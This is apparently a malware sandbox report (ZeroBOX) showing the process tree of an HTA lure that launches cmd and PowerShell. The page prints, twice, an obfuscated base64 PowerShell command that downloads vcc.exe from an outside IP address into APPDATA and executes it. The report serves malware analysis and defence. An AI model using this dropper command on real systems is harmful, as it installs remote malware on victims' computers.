| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\kissingwithbestexperiencedgirlfriendonhereformenice.hta.html
2636
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2636 CREDAT:145409
  2724
  - cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
    2948
    - powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
      3008
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\icd74nk2.cmdline"
        2432
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESAB6E.tmp" "c:\Users\test22\AppData\Local\Temp\CSCAB00.tmp"
        2400

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents